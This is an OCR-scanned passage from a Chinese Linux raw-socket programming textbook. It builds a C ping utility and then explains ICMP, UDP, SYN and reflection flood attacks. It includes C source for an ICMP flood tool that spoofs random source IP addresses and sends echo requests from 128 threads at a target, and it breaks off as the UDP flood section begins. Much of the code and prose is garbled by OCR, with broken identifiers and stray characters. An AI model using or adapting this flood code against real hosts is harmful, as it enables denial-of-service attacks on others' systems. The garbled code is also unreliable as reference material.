函数 icmp_unpack(O 用 于 剥离 PP 头 部 , 分 析 ICMP 头 部 的 值 。 判 断 是 否 为 正确 的 ICMP 
报 文 ， 并 打印 结果 。 

参数 buf 为 剥 去 了 以 太 网 部 分 数据 的 IP 数据 报 文 ，len 为 数据 长 度 。 可 以 利用 IP 头 部 
的 参数 快速 地 跳 到 ICMP 报 文部 分 ，IP 结构 的 ip_hl 标识 IP 头 部 的 长 度 ， 由 于 ip_hl 标识 
的 是 4 字 节 单位 ， 所 以 需要 乘 以 4 来 获得 ICMP 段 的 地 址 。 

获得 ICMP 数据 段 后 ， 判 断 其 类 型 是 否 为 ICMP_ECHOREPLY， 并 核实 其 标识 是 否 为 
本 进程 的 PID。 由 于 需要 判断 数据 报 文 的 往返 时 间 ， 在 本 程序 中 需要 先 查 找 这 个 包 发 送 时 
的 时 间 ， 与 当前 时 间 进 行 计算 后 ， 可 以 得 出 本 地 主机 与 目标 主机 之 间 网 络 ICMP 回 显 报 文 
的 差 值 。 

程序 需要 累加 成 功 接 收 到 的 报 文 ， 用 于 程序 退出 时 的 统计 。 

/* 解 压 接收 到 的 包 , 并 打印 信息 */ 


static int icmp unpack(char *buf,int len) 


{ 


.387 。 
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int i,iphdrlen; 
struct ip *ip = NULL; 
struct icmp *icmp = NULL; 


int 了 七 

ip=(struct ip *)buf; /*IP 头 部 */ 
iphdrlen=ip->ip hl*4; /*IP 头 部 长 度 */ 
icmp=(struct icmp *) (buf+iphdrlen) /*ICMP 段 的 地 址 */ 


len-=iphdrlen; 
/# 判 断 长 度 是 否 为 ICMP 包 */ 

if( len<8) 
{ 

printf ("ICMP packets\'s length is less than 8\n"); 

return -1; 
} 
/*ICMP 类 型 为 TCMP_ECHOREPLY 并 且 为 本 进程 的 PID*/ 
if( (icmp->icmp type==ICMP ECHOREPLY) && (icmp->icmp id== Pid) ) 
{ 

struct timeval tv_ internel,tv recv,tv_send; 

/* 在 发 送 表格 中 查找 已 经 发 送 的 包 , 按照 seq*/ 

pingm pakcet* packet = icmp findpacket (icmp->icmp seq); 

if(packet == NULL) 

return -1; 


packet->flag = 0; /* 取 消 标志 */ 
tv_send = packet->tv_ begin; /* 获 取 本 包 的 发 送 时 间 */ 
gettimeofday (&tv_recv, NULL); /* 读 取 此 时 间 , 计算 时 间 差 */ 


tv_internel = icmp tvsubl(tv recv,tv_ send); 
rtt = tv_ internel.tv sec*1000+tv internel.tv usec/1000; 
/* 打 印 结果 ,包含 
* ICMP 段 长 度 
*# 源 IP 地 址 
*+ 包 的 序列 号 
TTE 
* ”时 间 差 
A 
printf ("%d byte from %s: icmp_ seq=%u ttl=%d rtt=%d ms\n", 
len, 
inet_ntoa (ip->ip_src)， 
icmp->icmp_seq, 
ip->ip ttl, 
ett 


packet recv ++; /* 接 收 包 数 量 加 1*/ 
上 
人 二 所 全 
{ 
return -1; 
} 
} 


函数 的 返回 值 为 -1 时 表示 出 错 ， 为 其 他 值 则 正常 。 
13.6.5 “计算 时 间 差 
由 于 需要 评估 网 络 状况 ， 在 发 送 数据 报 文 的 时 候 保存 发 送 时 间 ， 接 收 到 报 文 后 ， 计 算 
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两 个 时 刻 之 间 的 差 值 ， 生 成 了 ICMP 源 主机 和 目标 主机 之 间 的 网 络 状况 的 时 间 评 估 。 


/* 计 算 时 间 差 time_sub 
参数 : 
end, 接收 到 的 时 间 
begin, 开始 发 送 的 时 间 
返回 值 : 
使 用 的 时 间 
A 
static struct timeval icmp tvsubl(struct timeval end,struct timeval begin) 


. 
struct timeval tv; 
/* 计 算 差 值 */ 
tv.tv_sec = end.tv_sec - begin.tv sec; 
tv.tv usec = end.tv usec - begin.tv usec; 
/* 如 果 接 收 时 间 的 usec 值 小 于 发 送 时 的 usec 值 ,从 usec 域 借 位 */ 
if(tv.tv usec < 0) 
{ 
tv.tv sec -—-; 
tv.tv usec += 1000000; 
} 


return tv; 


} 
本 代码 用 结构 struct timeval 来 表示 时 间 和 差 值 。 
13.6.6 ”发 送 报 文 


发 送 报 文 函数 是 一 个 线程 , 每 隔 1s 向 目的 主机 发 送 一 个 ICMP 回 显 请 求 报 文 ， 它 在 整 
个 程序 处 于 激活 状态 (alive 为 1) 时 一 直 发 送 报 文 。 
(1) 获得 当前 的 时 间 值 , 按照 序列 号 packet send 将 ICMP 报 文 打 包 到 缓冲 区 send_buff 
中 后 ， 发 送 到 目的 地 址 。 发 送 成 功 后 ， 记 录 发 送 报 文 的 状态 : 
口 序号 seq 为 packet_send。 
口 标志 flag 为 1， 表示 已 经 发 送 但 是 没有 收 到 响应 。 
口 发 送 时 间 为 之 前 获得 的 时 间 。 
(2) 每 次 发 送 成 功 后 序号 值 会 增加 1， 即 packet_send++。 
(3) 在 线程 开始 进入 主 循环 while(alive) 之 前 ， 将 整个 程序 的 开始 发 送 时 间 记 录 下 来 ， 
用 于 在 程序 退出 的 时 候 进行 全 局 统计 ， 即 gettimeofday(&tv_begin,NULL), 将 时 间 保 存在 变 
量 tv_begin 中 。 
/* 发 送 ICMP 回 显 请 求 包 */ 
static void* icmp send(void *argv) 
站 
/* 保 存 程序 开始 发 送 数 据 的 时 间 */ 
gettimeofday (&tv begin, NULL); 
while(alive) 
{ 
int size = 0; 
struct timeval tv; 
gettimeofday (gtv, NULL); /* 当 前 包 的 发 送 时 间 */ 
/* 在 发 送 包 状态 数组 中 找 一 个 空闲 位 置 */ 


ns 
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Pingm pakcet *packet = icmp findpacket(-1) 7 


if(packet) 

:| 
Packet->seq = packet send; /* 设 置 seq*/ 
packet->flag = 1; /* 已 经 使 用 */ 
gettimeofday( &packet->tv begin, NULL); /* 发 送 时 间 */ 


7 


icmp pack((struct icmp *)send buff，Packet_send，&tv，64 ); 
/* 打 包 数 据 */ 
size = sendto (rawsock, send buff, 64, 0, /* 发 送 给 目的 地 址 */ 
(struct sockaddr *) &dest, sizeof (dest) ); 
if(size <0) 
{ 
perror ("sendto error"); 
continue; 
’ 
packet_ send++; /* 计 数 增加 */ 
/* 每 隔 1s, 发 送 一 个 ICMP 回 显 请 求 包 */ 
sleep (1); 


13.6.7 ”接收 报 文 


与 发 送 函数 一 样 ， 接 收报 文 也 用 一 个 线程 实现 ， 使 用 select() 轮 询 等 待 报 文 到 来 。 当 接 
收 到 一 个 报 文 后 ， 使 用 函数 icmp_unpack() 来 解 包 和 查找 报 文 之 前 发 送 时 的 记录 ， 获 取 发 送 
时 间 ， 计 算 收 发 差 值 并 打印 信息 。 

(1) 接收 成 功 后 将 合法 的 报 文 记 录 重 置 为 没有 使 用 ，flag 为 0。 

(2) 接收 报 文 数量 增加 1。 

(3) 为 了 防止 丢 包 ，select() 的 轮 询 时 间 设 置 的 比较 短 。 


/* 接 收 ping 目的 主机 的 回复 */ 
static void *icmp recv(void *argv) 
{ 
/* 轮 询 等 待 时 间 */ 
struct timeval tv; 
tv.tv usec = 200; 
tv.tv sec = 0; 
fd set readfd; 
/* 当 没有 信号 发 出 一 直接 收 数据 */ 
while (alive) 
{ 
int ret = 0; 
FD ZERO(&readfd); 
FD SET(rawsock, &readfd); 
ret = select (rawsock+l1, &readfd, NULL, NULL, &tv); 
switch (ret) 
{ 
Case 二 下 
/* 错 误 发 生 */ 
break; 
case 0: 
/* 超 时 */ 


break; 
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default: 
{ 

/# 收 到 一 个 包 */ 

int fromlen = 0; 

struct sockaddr from; 

/* 接 收 数据 */ 

int size = recv(rawsock, recv buff,sizeof(recv buff), 

0); 

ifl(errno == EINTR) 

{ 
perror ("recvfrom error"); 
continue; 


. 
/+* 解 包 , 并 设置 相关 变量 */ 
ret = icmp unpack (recv buff, size); 
if(ret == -1) 
{ 
continue; 
} 
} 


break; 


13.6.8” 主 函数 过 程 


ping 程序 的 实现 使 用 了 两 个 线程 ， 一 个 线程 iemp_send() 用 于 发 送 请 求 ， 另 一 个 线程 
icemp_recv() 用 于 接收 远程 主机 的 响应 。 当 变量 alive 为 0 时， 两 个 线程 退出 。 


1. ping 数据 的 数据 结构 


类 型 为 结构 struct pingm_packet 的 变量 pingpacket 用 于 保存 发 送 数 据 报 文 的 状态 。 

口 tv_begin 用 于 保存 发 送 的 时 间 。 

口 tv_end 用 于 保存 数据 报 文 接收 到 的 时 间 。 

口 seq 是 序列 号 ， 用 于 标识 报 文 ， 作 为 索引 。 

口 flag 用 于 表示 本 单元 的 状态 ，1 表示 数据 报 文 已 经 发 送 ， 但 是 没有 收 到 回应 包 ; 0 
表示 已 经 接收 到 回应 报 文 ， 这 个 单元 可 以 再 次 用 于 标识 发 送 的 报 文 。 


/* 保 存 已 经 发 送 包 的 状态 值 */ 
typedef struct pingm pakcet{ 
struct timeval tv begin; /* 发 送 的 时 间 *#/ 
struct timeval tv end; /* 接 收 到 的 时 间 */ 
short seq; /* 序 列 号 */ 
int flag; /*1, 表示 已 经 发 送 但 没有 接收 到 回应 包 0, 表示 接收 到 回应 包 */ 


}pingm pakcet; 
static pingm pakcet pingpacket[128]; 


2. 信号 SIGINT 处 理 函 数 
本 程序 截取 了 信号 SIGINT, 用 函数 iemp_sigint() 对 SIGINT 进行 处 理 。 当 用 户 按 Ctrl+C 
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键 时 , 将 alive 设置 为 0, 使 得 接收 和 发 送 两 个 线程 退出 ,并 计算 结束 时 的 时 间 。 代码 如 下 : 
/* 终 端 信号 处 理 函 数 SIGINT*/ 


static void icmp sigint (int signo) 


{ 


alive = 0; /* 告 诉 接收 和 发 送 线程 结束 程序 */ 
gettimeofday (&tv_end, NULL); /* 读 取 程序 结束 时 间 */ 
tv _interval = icmp tvsub(tv end, tv begin); /* 计 算 总 共 所 用 时 间 */ 


return; 


3. 查找 数组 中 的 标识 函数 icmp_findpacket() 


函数 icmp_findpacket0 用 于 在 数组 pingpacket 中 查找 一 个 报 文 的 标识 ， 参 数 为 -1 时 表 
示 查 找 一 个 空 包 ， 存 放 已 经 发 送 成 功 的 数据 报 文 ， 其 他 值 表示 查找 seq 匹配 的 标识 。 


/* 查 找 一 个 合适 的 包 位 置 
* 当 seq 为 -1 时 ,表示 查找 空 包 
# 其 他 值 表示 查找 seq 对 应 的 包 */ 
static pingm pakcet *icmp findpacket (int seq) 
{ 
int i=0; 
pingm pakcet *found = NULL; 
/* 查 找 包 的 位 置 */ 
if(seq == -1) /* 查 找 空 包 的 位 置 */ 
{ 
for(i = 0;i<128;i++) 
{ 
if (pingpacket [i].flag == 0) 
{ 
found = g&pingpacket [i]; 
break; 


} 
} 
else if(seq >= 0) /* 查 找 对 应 seq 的 包 */ 
{ 
for(i = 0;i<128;i++) 
{ 
if(pingpacket [i] .seq == seq) 
{ 
found = &pingpacket [i]; 
break; 


区 
} 


return found; 


4. 统计 数据 结果 函数 icmp_statistics() 
icmp_statistics() 函 数 用 于 统计 总 体 的 结果 ， 包 含 成 功 发 送 的 报 文 数量 、 成 功 接收 的 报 
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文 数量 、 丢 失 报 文 的 百分比 和 总 共 程 序 运行 的 时 间 。 
/* 打 印 全 部 ICMP 发 送 接收 统计 结果 */ 


static void icmp_ statistics (void) 
{ 


long time = (tv_ interval.tv sec + 1000 )+ (tv interval.tv usec/1000); 


Printf("--- %s ping statistics ---\n",dest str);  /* 目 的 IP 地址 */ 
printf("%d packets transmitted, %d received, %d%c packet loss, time %d 
ms\n", 

packet send, /* 发 送 */ 

packet recyv, /+* 接 收 */ 

(packet_ send-packet recv)*100/packet send, /* 丢 失 百 分 比 */ 

1g 

time); /* 时 间 */ 


13.6.9 主 函 数 main() 


在 主 程序 中 需要 注意 如 下 几 点 : 

口 使 用 getprotobyname() 函 数 获得 icmp 对 应 的 ICMP 协议 值 。 

口 对 输入 的 目的 主机 地 址 兼容 域名 和 耳 地 址 , 使 用 gethostbyname() 函 数 来 获得 DNS 
对 应 的 IP 地 址 ，inet_addr() 函 数 获得 字符 串 类 型 的 PP 地 址 对 应 的 整 型 值 。 

口 为 了 防止 远程 主机 发 送 过 大 的 包 或 者 本 地 来 不 及 接收 现象 的 发 生 ，setsockopt 

(rawsock、SOL_SOCKET、SO_RCVBUF、&size、sizeof(size)) 函数 将 socket 的 

接收 缓冲 区 设置 为 128KB。 

口 对 信号 SIGINT 进行 了 截取 。 

口 建立 两 个 线程 icemp_send0 和 icmp_recv0 进 行 接收 和 发 送 ， 然 后 主 程序 等 待 两 个 线 
程 结束 。 


1. 主 函 数 初 始 化 


一 些 必 需 的 头 文件 、 函 数 的 声明 及 全 局 变量 的 声明 放 在 这 里 


/*ping.c*/ 

#include <sys/socket.h> 

#include <netinet/in.h> 

#include <netinet/ip.h> 

#include <netinet/ip icmp.h> 

#include <unistd.h> 

#include <signal.h> 

#include <arpa/inet.h> 

#include <errno.h> 

#include <sys/time.h> 

#include <stdio.h> 

#include <string.h> /*bzero*/ 

#include <netdb.h> 

#include <pthread.h> 

static pingm pakcet *icmp findpacket (int seq); 

static unsigned short icmp cksum(unsigned char +*data, int len); 

static struct timeval icmp tvsub(struct timeval end,struct timeval begin); 
static void icmp_ statistics (void); 

static void icmp pack(struct icmp *icmph, int seq, struct timeval *tv, int 
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length ) 

static int icmp unpack(char *buf,int Len) 

static void *icmPp_ recv(void *#argv); 

static void * icmp_ send(void *argv); 

static void icmp sigint (int signo); 

static void icmp usage(); 

#define K 1024 

#define BUFFERSIZE 72 /* 发 送 缓冲 区 大 小 */ 

static unsigned char send buff[BUFFERSIZE]; 

static unsigned char recv buff[2*K]; /* 为 防止 接收 溢出 ,接收 缓冲 区 设置 大 一 些 */ 


static struct sockaddr in dest; /* 目 的 地 址 */ 

static int rawsock = 0; /* 发 送 和 接收 线程 需要 的 socket 描述 符 */ 
static pid t pid=0; /* 进 程 PID*/ 

static int alive = 0; /* 是 否 接 收 到 退出 信号 */ 

static short packet send = 0; /* 已 经 发 送 的 数据 包 有 多 少 */ 

static short packet recv = 0; /* 已 经 接收 的 数据 包 有 多 少 */ 

static char dest str[80]; /* 目 的 主机 字符 串 */ 


static struct timeval tv begin, tv end,tv _ interval7 
/* 本 程序 开始 发 送 、 结 束 和 时 间 间 隔 */ 
static void icmp_usage() 
{ 
/*ping 加 IP 地 址 或 者 域名 */ 
printf ("ping aaa.bbb.ccc.ddd\n"); 


2. 进行 数据 报 文 发 送 之 前 的 准备 工作 


主要 包含 获得 目的 主机 的 IP 地 址 、 构 建 原 始 套 接 字 、 初 始 化 缓冲 区 和 变量 等 工作 。 这 
些 工作 里 面 还 包含 接收 缓冲 区 的 修改 ， 防 止 返回 数据 过 大 造成 数据 缓冲 区 溢出 。 

在 本 段 代码 里 使 用 了 getprotobyname() 函 数 来 获得 ICMP 协议 的 类 型 , 而 不 用 用 户 记忆 
协议 的 具体 类 型 ， 只 要 记 住 名 称 就 可 以 了 。 

/* 主 程序 */ 


int main(int argc, char *argv[]) 

{ 
struct hostent * host = NULL; 
struct protoent *protocol = NULL; 
char protoname[]= "icmp"; 
unsigned long inaddr = 1; 
int size = 128*K; 


/* 参 数 是 否 数 量 正确 */ 
if(argc < 2) 
{ 
icmp usage(); 
return -1; 
1 


/* 获 取 协 议 类 型 TCMP*/ 
protocol = getprotobyname (protoname); 
if (protocol == NULL) 
{ 
perror ("getprotobyname () "); 
return -1; 


/* 复 制 目的 地 址 字符 串 */ 
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memcpy (dest_str， argv[1]，strlen(argv[1])+1) 
memset (pingpacket, 0, sizeof (pingm Pakcet) * 128) 

/*socket 初始 化 */ 
rawsock = socket (AF_ INET, SOCK RAW, protocol->p proto); 
if(rawsock < 0) 

{ 
perror ("socket"); 
return -1; 

} 

/* 为 了 与 其 他 进程 的 ping 程序 区 别 , 加 入 pid*/ 
pid = getuid(); 

/* 增 大 接收 缓冲 区 , 防止 接收 的 包 被 覆盖 */ 
setsockopt (rawsock, SOL SOCKET, SO RCVBUF, &size, sizeof (size)); 
bzero(&dest, sizeof (dest)); 

/* 获 取 目 的 地 址 的 IP 地 址 */ 
dest.sin family = AF_INET; 


/* 输 入 的 目的 地 址 为 字符 串 IP 地 址 */ 
inaddr = inet addr(argv[1]); 
if(inaddr == INADDR NONE) 
{ 
/* 输 入 的 是 DNS 地 址 */ 
host = gethostbyname (argv[1]); 
if(host == NULL) 
1 
perror ("gethostbyname"); 
return -1; 
} 
/* 将 地 址 复制 到 dest 中 */ 
memcpy ( (char *) &dest.sin addr, host->h addr, host->h length); 
} 
else /* 为 IP 地 址 字符 串 */ 
{ 
memcpy ( (char*) &gdest.sin addr, &inaddr, sizeof (inaddr) ) 
1 
/* 打 印 提示 */ 
inaddr = dest.sin addr.s addr; 
printf ("PING %s (%d.%d.%d.%d) 56(84) bytes of data.\n", 
dest_str, 
(inaddr&0x000000FF) >>0, 
(inaddr&0x0000FF00) >>8, 
(inaddr&0x00FF0000) >>16, 
(inaddr&0xFF000000) >>24); 
/* 截 取信 号 SIGINT, 将 icmp_sigint 挂 接 上 */ 
signal (SIGINT, icmp_ sigint); 


3. 发 送 数据 并 接收 回应 

建立 两 个 线程 ， 一 个 用 于 发 送 数据 ， 另 一 个 用 于 接收 响应 数据 。 主 程序 等 待 两 个 线程 
运行 完毕 后 再 进行 下 一 步 动作 。 最 后 ， 主 程序 将 发 送 的 数据 和 接收 的 数据 进行 统计 ， 并 将 
结果 打印 出 来 。 


alive = 1; /* 初 始 化 为 可 运行 */ 

pthread t send id, recv id; /* 建 立 两 个 线程 ,用 于 发 送 和 接收 */ 
int err = 0; 

err = pthread create(&send id, NULL, icmp_send, NULL); /* 发 送 */ 
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if(erz < 0) 
{ 
return -1; 
} 
err = pthread create(g&recv id, NULL, icmp recv, NULL); /#* 接 收 #*/ 
ifl(err < 0) 
{ 


return -1; 


} 

/* 等 待 线程 结束 */ 
pthread join(send_ id, NULL); 
pthread join(recv id, NULL); 

/* 清 理 并 打印 统计 结果 */ 


close (rawsock); 
icmp statistics(); 
return 0; 


} 


13.6.10 ”编译 测试 


将 所 有 的 代码 保存 到 文件 ping.c 中 ， 使 用 如 下 命令 方式 进行 编译 ， 生 成 可 执行 文件 
ping。 
$gcc -o ping ping.c -lpthread 


运行 程序 ping， 对 本 机 地 址 进行 测试 ， 在 出 现 4 个 响应 后 按 Ctrl+C 键 ， 结 果 如 下 : 


XDAERGTLE2I 人 SO 二 

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 

64 byte from 127.0.0.1: icmp seq=0 ttl=64 rtt=0 ms 

64 byte from 127.0.0.1: icmp_ seq=1 ttl=64 rtt=0 ms 

64 byte from 127.0.0.1: icmp seq=2 ttl=64 rtt=0 ms 

64 byte from 127.0.0.1: icmp_ seq=3 ttl=64 rtt=0 ms 

C=== T2700 ping statistics === 

4 packets transmitted, 4 received, 0% packet loss, time 3530ms 

与 Linux 下 面 的 ping 程序 相 比 ， 上 面 的 架构 十 分 简单 。 例 如 发 送 的 时 间 不 能 调整 、 发 
送 请 求 包 的 大 小 不 能 设置 、 计 算 时 间 差 值 的 方法 不 严谨 等 。 

读者 可 以 参考 busybox 下 的 ping 代码 或 者 到 网 站 http://www.koders.com/ 上 查询 ， 获 取 
比较 完整 的 代码 。 


13.7 洪水 攻击 


洪水 攻击 (FLOOD ATTACK ) 指 的 是 利用 计算 机 网 络 技术 向 目标 机 发 送 大 量 的 无 用 数 
据 报 文 ， 使 得 目标 主机 忙于 处 理 无 用 的 数据 报 文 而 无 法 提供 正常 服务 的 网 络 行为 。 

洪水 攻击 ， 顾 名 思 义 是 用 大 量 的 请 求 来 淹没 目标 机 。 潜 水 攻击 主要 利用 了 网 络 协议 的 
安全 机 制 或 者 直接 用 十 分 简单 的 ping 资源 的 方法 来 对 目标 机 造成 影响 。 

攻击 的 手段 主要 是 使 用 畸形 的 报 文 来 让 目标 机 进行 处 理 或 者 等 待 ， 一 般 都 是 在 原始 套 
接 字 层 进行 程序 设计 。 洪 水 攻击 主要 分 为 ICMP、UDP 和 SYN 攻击 3 种 类 型 。 

口 ICMP 回 显 攻击 利用 原始 套 接 字 向 目标 机 发 送 大 量 的 回 显 请 求 或 者 回 显 响应 数据 ， 


i 


第 13 章 “原始 套 接 字 


由 于 此 数据 协议 栈 默 认 是 必须 处 理 的 ， 因 此 可 以 对 目标 机 造成 影响 。 

口 UDP 攻击 则 向 目标 机 UDP 服务 端口 发 送 UDP 报 文 ， 由 于 目标 机 需要 对 端口 进行 
处 理 ， 如 果 知 道 目 标 机 的 基本 数据 格式 ， 则 可 以 构建 十 分 有 效 的 代码 来 对 目标 机 
造成 很 大 伤害 。 

口 SYN 攻击 利用 了 TCP 连接 中 的 三 次 握手 ， 在 发 送 一 个 SYN 原始 报 文 后 ， 目 标 机 
需要 对 发 送 的 报 文 进 行 处 理 并 等 待 超时 。 


13.8 ICMP 洪水 攻击 


本 实例 的 ICMP 代码 是 简单 、 直 接 方法 ， 建 立 多 个 线程 向 同一 个 主机 发 送 ICMP 请 
求 ， 而 本 地 的 IP 地 址 是 伪装 的 。 由 于 程序 仅 发 送 响应 ， 不 接收 响应 ， 容 易 造成 目标 主机 
的 宕 机 。 


13.8.1 ICMP 洪水 攻击 的 原理 


ICMP Flood 是 一 种 在 ping 基础 上 形成 的 ， 但 是 用 ping 程序 很 少 能 造成 目标 机 宕 机 的 
问题 。 这 里 边 最 大 的 问题 是 提高 处 理 的 速度 。ICMP 洪水 攻击 主要 有 以 下 3 种 方式 。 

口 直接 洪水 攻击 : 这 样 做 需要 本 地 主机 的 带宽 与 目标 主机 之 间 带 宽 进行 比拼 。 可 以 
采用 多 线程 的 方法 一 次 性 地 发 送 多 个 ICMP 请 求 报 文 ， 让 目标 主机 处 理 过 程 出 现 
问题 而 速度 缓慢 或 者 宕 机 。 直 接 攻击 的 方法 有 一 个 缺点 ， 就 是 可 以 根据 来 源 的 了 
地 址 屏蔽 攻击 源 ， 并 且 目 标 源 容易 暴露 ， 被 对 方 反 攻击 。 攻 击 的 过 程 如 图 13.16 
所 示 。 

口 伪装 IP 攻击 : 在 直接 洪水 攻击 的 基础 上 ， 将 发 送 方 的 IP 地 址 用 伪装 的 IP 地 址 代 
替 。 将 直接 洪水 攻击 的 缺点 进行 了 改进 。 攻 击 的 过 程 如 图 13.17 所 示 。 


源 地 址 源 地 址 

攻击 方 10.10.10.10 目标 机 攻击 方 192.168.1.151 目标 机 

10.10.10.10 10.10.20.10 | 10.10.10.10 10.10.20.10 
图 13.16 直接 ICMP 洪水 攻击 图 13.17 伪装 ICMP 洪水 攻击 


口 反射 攻击 : 与 直接 攻击 和 伪装 攻击 不 同 ， 反 射 攻 击 不 是 直接 对 目标 机 进行 攻击 ， 
而 是 让 其 他 一 群 主机 误 认 为 目标 机 在 向 它们 发 送 ICMP 请 求 包 ， 一 群 主机 向 目标 
机 发 送 ICMP 应 答 包 。 攻 击 方向 一 群 主机 发 送 ICMP 请 求 ， 将 请 求 的 源 地 址 伪装 
成 目标 机 的 耳 地 址 ， 这 样 目标 机 就 成 了 ICMP 回 显 反射 的 焦点 ， 如 图 13.18 所 示 。 
攻击 方 的 卫 地 址 为 10.10.10.10， 向 一 组 服务 器 a、b、... 等 发 送 ICMP 回 显 请 求 报 
文 ， 并 将 发 送 方 的 IP 地 址 伪装 成 目标 机 的 IP 地 址 10.10.8.10。 服 务 器 组 在 经 过 处 
理 后， 会 发 送 ICMP 的 回 显 报 文 给 目标 机 。 


13.8.2 ICMP 洪水 攻击 的 例子 


上 面 对 ICMP 洪水 攻击 的 基本 原理 进行 了 介绍 ， 本 节 为 一 个 ICMP 的 样 例 代 码 ， 下 面 
将 逐步 介绍 。 
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服务 器 a 


服务 器 b 


目标 机 
10. 10. 8. 10 


10.10.8.10 ， 源 地 址 
10. 10. 8. 10 


源 地 址 
10. 10.8. 10 


OS 


攻击 方 
10. 10. 10. 10 


图 13.18 发射 ICMP 攻击 


1. 随机 函数 myrandom 


随机 函数 主要 为 了 生成 一 个 不 重复 的 并 位 于 一 定数 值 空间 的 值 。srand0) 函 数 用 于 初始 
化 随机 函数 产生 器 ， 由 于 random() 函 数 是 伪 随 机 函数 ， 是 按照 一 定 规律 循环 的 ， 与 srand() 
函数 有 关 ， 所 以 每 次 用 不 同 的 值 进行 初始 化 ， 这 样 生成 的 随机 数 就 有 了 真正 的 随机 性 。 

/* 随 机 函数 产生 函数 

* 由 于 系统 的 函数 为 伪 随机 函数 

* ”其 与 初始 化 有 关 , 因此 每 次 用 不 同 值 进行 初始 化 


本 人 
static inline long myrandom (int begin, int end) 
{ 
int gap = end - begin +1; 
int ret = 0; 
/* 用 系统 时 间 初 始 化 */ 
srand( (unsigned)time (0)); 
/* 产 生 一 个 介 于 begin 和 end 之 间 的 值 */ 
ret = random()%gap + begin; 
return ret; 
h 


"3 * 


2. 多 线程 函数 DoS_fun() 
本 程序 也 是 使 用 多 线程 进行 协同 工作 ， 线 程 函数 为 DoS_fun0， 一 直 进 行 syn 的 连接 。 


static void DoS fun (unsigned long ip) 


{ 


while (alive) 
下 

DoS syn() 
} 


3. ICMP 头 部 打包 函数 DoS_icmp() 

DoS_icmp() 函 数 打包 并 填充 IP 头 部 、ICMP 头 部 发 送 数据 报 文 。 由 于 打包 函数 是 本 程 
序 中 最 经 常 使 用 的 ， 容 易 造 成 计算 上 的 瓶颈 ， 所 以 对 其 进行 了 优化 ， 校 验 和 并 没有 完全 计 
算 ， 而 仅仅 计算 了 两 次 数据 变化 造成 的 校 验 和 差 值 。 


static void DoS icmp (void) 


{ 


struct sockaddr in to; 

struct ip *iph; 

struct icmp *icmph; 

char *packet; 

int pktsize = sizeof (struct ip) + sizeof (struct icmp) + 64; 
packet = malloc (pktsize); 

iph = (struct ip *) packet; 

icmph = (struct icmp *) (packet + sizeof (struct ip)); 

memset (packet, 0, pktsize); 


iph->ip v = 4; /*IP 的 版 本 , IPv4*/ 
iph->ip hl = 5; /*IP 头 部 长 度 , 字 节 数 */ 
iph->ip_tos = 0; /* 服 务 类 型 #/ 
iph->ip_len = htons (pktsize); /*IP 报 文 的 总 长 度 */ 
iph->ip_id = htons (getpid ()); /* 标 识 , 设置 为 PID*/ 
iph->ip_off = 0; /* 段 的 偏 移 地 址 */ 
iph->ip_tt1l = 0x0; /* 生 存 时 间 TTL*/ 
iph->ip p = PROTO ICMP; /* 协 议 类 型 */ 
iph->ip_sum = 0; /* 校 验 和 , 先 填写 为 0*/ 
iph->ip_src = (unsigned long) myrandom(0，65535); /* 发 送 的 源 地 址 */ 
iph->ip dst = dest; /# 发 送 目标 地 址 */ 
icmph->icmp type = ICMP ECHO; /*ICMP 类 型 为 回 显 请 求 */ 
icmph->icmp code = 0; /* 代 码 为 0*/ 


/* 由 于 数据 部 分 为 0, 并 且 代码 为 0, 直接 对 不 为 0 即 icmp_type 部 分 计算 */ 
icmph->icmp_sum = htons (~(ICMP ECHO << 8)); 


/* 填 写 发 送 目 的 地 址 部 分 */ 
to.sin family = AF INET; 
to.sin addr.s addr = iph->ip dst; 
to.sin port = htons (0) 

/* 发 送 数据 */ 


sendto (rawsock, packet, pktsize, 0, (struct sockaddr *) &to, sizeof 


(struct sockaddr)); 
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free (Packet) 


4. 线程 函数 DoS_fun() 
当 alive 为 1， 一 直 执 行 函 数 icemp()。 


static void DoS fun (unsigned long ip) 
{ 
while(alive) 
{ 
icmp(); 


} 


5. 主 函 数 
函数 的 头 文件 和 重要 的 变量 代码 如 下 : 


#include <stdio.h> 
#include <ctype.h> 
#include <unistd.h> 
#include <fcnt1.h> 
#include <signal.h> 
#include <sys/time.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <netdb.h> 
#include <errno.h> 
#include <stdlib.h> 
#include <time.h> 


#define MAXCHILD 128 

static unsigned long dest = 0; 
static int PROTO ICMP = -1; 
static alive = -1; 


/*# 释 放 内 存 */ 


/* 最 多 线程 数 */ 

/* 目 的 IP 地 址 */ 
/*ICMP 协议 的 值 */ 
/* 程 序 活动 标志 */ 


主 函 数 的 过 程 先 进行 必须 的 参数 初始 化 、 套 接 字 初始 化 等 工作 。 然 后 建立 128 个 线程 


同时 构建 和 发 送 ICMP 包 来 攻击 目的 主机 。 


int main(int argc, char *argv[]) 

{ 
struct hostent * host = NULL; 
struct protoent *protocol = NULL; 
char protoname[]= "icmp"; 


int i = 0; 
pthread t pthread [MAXCHILD]; 
int err = -1; 


alive = 1; 
signal (SIGINT, DoS_ sig); 
Erde 2) 
{ 
return -1; 


} 


* 400 。 


/* 截 取信 号 Ctrl+c*/ 
/* 参 数 数量 是 否 正确 */ 
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protocol = getprotobyname (Protoname) ; /* 获 取 协 议 类 型 ICMP*/ 
if (protocol == NULL) 
EC 

perror ("getprotobyname () "); 

return -1; 


} 
PROTO ICMP = protocol->p proto; 


dest = inet addr(argv[1]); /* 输 入 的 目的 地 址 为 字符 串 IP 地 址 */ 
if(dest == INADDR_ NONE) 
host = gethostbyname (argv[1]); /* 输 入 的 主机 地 址 为 DNS 地 址 */ 
if(host == NULL) 
{ 
perror ("gethostbyname"); 
return -1; 


} 

/* 将 地 址 复制 到 dest 中 */ 

memcpy ( (char *) &dest, host->h addr.s addr, host->h length); 
} 


rawsock = socket (REF _INET，SOCK RAW，RAW); /+ 建立 原始 socket*/ 
if (rawsock < 0) 
rawsock = socket (AF_INET, SOCK RAW, PROTO ICMP); 


setsockopt (rawsock, SOL IP, IP HDRINCL, "1", sizeof ("1")); 
/* 设 置 IP 选项 */ 


for (i=0; i<MAXCHILD; i++) /* 建 立 多 个 线程 协同 工作 */ 
{ 

err = pthread create(g&pthread[i], NULL, DoS_ fun, NULL); 
} 


for (i=0; i<MAXCHILD; i++) /* 等 待 线程 结束 */ 
{ 
pthread join(pthread[i], NULL); 
i 
close (rawsock); 


return 0; 


13.9 UDP 洪水 攻击 


本 程序 建立 了 一 个 固定 的 结构 , 将 IP 头 部 和 UDP 头 部 均 包 含 在 内 , 设置 数据 完毕 后 ， 
